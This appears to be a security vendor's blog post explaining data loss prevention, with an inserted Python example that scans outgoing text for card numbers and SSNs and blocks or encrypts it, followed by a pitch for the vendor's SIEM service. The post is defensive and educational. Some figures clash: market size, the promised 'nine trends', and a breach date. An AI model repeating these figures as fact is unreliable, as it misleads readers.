Data Loss Prevention: definition and uses
Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused or accessed by unauthorized users. DLP software classifies regulated, confidential and business-critical data and identifies violations of policies defined by the organization or contained in a predefined policy package. Default policies are typically dictated by regulatory compliance requirements such as HIPAA, PCI-DSS, or GDPR.
Once these possible breaches are identified, DLP applies remediation with warnings, encryption and other security actions. The goal is simple: prevent end users from accidentally or maliciously sharing data that could put your business at risk.
Data loss prevention software and tools monitor and control endpoint activities, filter data streams on corporate networks, and monitor data in the cloud to protect data at rest, in motion and in use. DLP also provides reports to meet compliance and auditing requirements, and it is a very useful tool for identifying areas of weakness and anomalies for incident response.
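The classify, check-policy, remediate loop described above can be sketched as follows. This is an added example, not code from any DLP product: the label names, channels, policy table and sample strings are all constructed assumptions, and the Luhn checksum is included to show how a content rule avoids flagging every long digit run as a card number.

```python
import re

# Candidate payment card numbers: 13-19 digits, optionally split by spaces or dashes.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")
# US Social Security number in dashed form (assumed stand-in for a PII rule).
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

# Hypothetical policy package: classification label -> action per egress channel.
POLICY = {
    "PCI": {"email": "block", "cloud_upload": "encrypt", "usb": "block"},
    "PII": {"email": "warn", "cloud_upload": "encrypt", "usb": "block"},
}
# Actions ordered from least to most restrictive; the strictest one wins.
SEVERITY = ["allow", "warn", "encrypt", "block"]


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: filters out order numbers and other random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def classify(text: str) -> set:
    """Return the set of sensitivity labels found in the content."""
    labels = set()
    for match in CARD_RE.finditer(text):
        if luhn_valid(re.sub(r"[ -]", "", match.group())):
            labels.add("PCI")
    if SSN_RE.search(text):
        labels.add("PII")
    return labels


def evaluate(text: str, channel: str) -> dict:
    """Classify content leaving via `channel` and pick the remediation action."""
    labels = classify(text)
    # Unknown channels default to a warning rather than silently allowing.
    actions = [POLICY[label].get(channel, "warn") for label in labels]
    action = max(actions, key=SEVERITY.index, default="allow")
    return {"labels": sorted(labels), "action": action}


if __name__ == "__main__":
    # Constructed samples: a test card number, a non-card digit run, a sample SSN.
    print(evaluate("Invoice for card 4111 1111 1111 1111", "email"))
    print(evaluate("Order ref 1234 5678 9012 3456", "email"))
    print(evaluate("Employee SSN 123-45-6789 attached", "cloud_upload"))
```

The returned label set and action are also what a DLP deployment would log for the compliance reporting mentioned above.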
Do I need to use DLP tools?
Data loss prevention addresses three main objectives that are common pain points for many organizations: personal information protection / compliance, intellectual property protection and data visibility.
Protection of personal information / compliance
Does your business collect and store personally identifiable information (PII), protected health information (PHI) or payment card information (PCI)? If so, you are more than likely subject to compliance regulations, such as HIPAA (for PHI) and GDPR (for EU residents’ personal data), which require you to protect your customers’ sensitive data.
Data loss prevention can identify, classify and label sensitive data and monitor the activities and events surrounding that data. In addition, the reporting capabilities provide the details needed for compliance audits.
Intellectual Property (IP) Protection
Does the company hold important intellectual property and trade or state secrets that could put your financial health and/or brand image at risk in the event of loss or theft? A DLP solution can classify intellectual property in both structured and unstructured form.
With policies and controls in place, you can protect against unwanted exfiltration of this data.
Data visibility
Is the company looking to gain additional visibility into data movement? A complete enterprise DLP solution can help you see and track your data across endpoints, networks, and the cloud. This will provide visibility into how individual users within your organization interact with data. As we have seen before when talking about social engineering, knowing how users behave is very useful. It is used to build a baseline profile and to check that there are no anomalies that could indicate account compromise.
The ones listed above are the primary use cases, but DLP can remedy a variety of other pain points, including insider threats, user and entity behavior analysis, and advanced threats.
Why adopt data loss prevention?
As of the 2017 Gartner Magic Quadrant for Enterprise DLP, the total data loss prevention market was estimated to reach $1.3 billion in 2020. The size was approximately $2.64 billion. The DLP market is not new, but it has evolved to include managed services, cloud functionality, and advanced threat protection, among other things.
All of this, coupled with the increasing trend in large corporate breaches, has spurred the adoption of DLP as a means of protecting sensitive data. Here are nine trends driving DLP adoption.
Growth of CISOs
More and more companies are hiring Chief Information Security Officers (CISOs) who report to the CEO. The latter wants to know the strategic plan for the prevention of data leaks. Data loss prevention tools provide clear value in this regard and give CISOs the reporting capabilities needed to provide regular updates.
Evolution of compliance requests
Global data protection regulations are constantly changing and every organization needs to be adaptable and prepared. In recent years, EU legislators have approved the GDPR. A similar event occurred in the US when New York State adopted the NYDFS Cybersecurity Regulation. Both of these new regulations have tightened data protection requirements. DLP solutions give organizations the flexibility to evolve with changes in global regulations.
Increase of “places” where data are stored
Increasing use of the cloud, complicated supply chain networks, and other services over which you no longer have full control have made data protection more complex. Visibility of events and the context surrounding the data before it leaves the organization is important to prevent your sensitive data from falling into the wrong hands.
Frequency of data breaches
Nation-state adversaries, cybercriminals and malicious insiders target your sensitive data for a variety of reasons, such as corporate espionage, personal financial gain and political advantage. Data loss prevention can protect against all kinds of adversaries, whether malicious or not.
In the past few years, there have been thousands of data breaches and many other security incidents. Billions of records were lost in gigantic data breaches such as the database misconfiguration that leaked nearly 200 million US voter records in 2015, the Equifax data breach that continued to grow, and the Yahoo breach affecting 3 billion users. These are just a few of the many headlines that underscore the need to protect your organization’s data.
The data value is very high
Stolen data is often sold on the Dark Web, where individuals and criminal groups can buy it and use it to their advantage. With some types of data selling for up to thousands of dollars, there is a clear financial incentive for data theft.
There is more data to steal
The definition of sensitive data has expanded over the years. Sensitive data now includes intangibles, such as pricing models and business methodologies. From 1975 to 2015, the amount of intangible assets grew from 17% to 84% of the market value, according to a study by Ocean Tomo. These assets also hit a record $21 trillion in 2018. This means your business has a lot more data to protect, and using data loss prevention can only help with that.
There is a shortage of specialized personnel
The security talent shortage won’t be resolved anytime soon, and it has probably already had an impact on your company. In fact, in a 2017 ESG and ISSA survey, 43% of respondents said their organizations were affected by the lack of skilled personnel. The shortage is worsening, with 3.5 million unfilled security positions expected by the end of 2021. Managed data loss prevention services act as remote extensions of your team to fill this staffing gap.
Adopt a SIEM to implement DLP
By now, a company’s highest-value product is the data it manages. The risk of data exfiltration, and of the economic and reputational loss that follows, is just around the corner. It is easy to say that it is enough to protect your data; the reality is that doing so gets more complicated every day.
The places where data is used and stored, and the methods for accessing and consulting it, keep increasing. Technology in general makes our lives easier while at the same time exposing our data. Corporate infrastructures are no exception; indeed, because of the very valuable nature of the data they collect, they are at greater risk.
The adoption of an adequate security system is essential and the solutions available are many. We at SOD, speaking of data loss prevention, recommend adopting a SIEM that includes the tools necessary to implement DLP techniques. For even better protection and more granular control of user data, the SOC as a Service also provides behavioral analysis performed by an artificial intelligence system (UEBA).
To find out how these services can help your business protect your data and infrastructure, do not hesitate to contact us, we will be happy to answer any questions.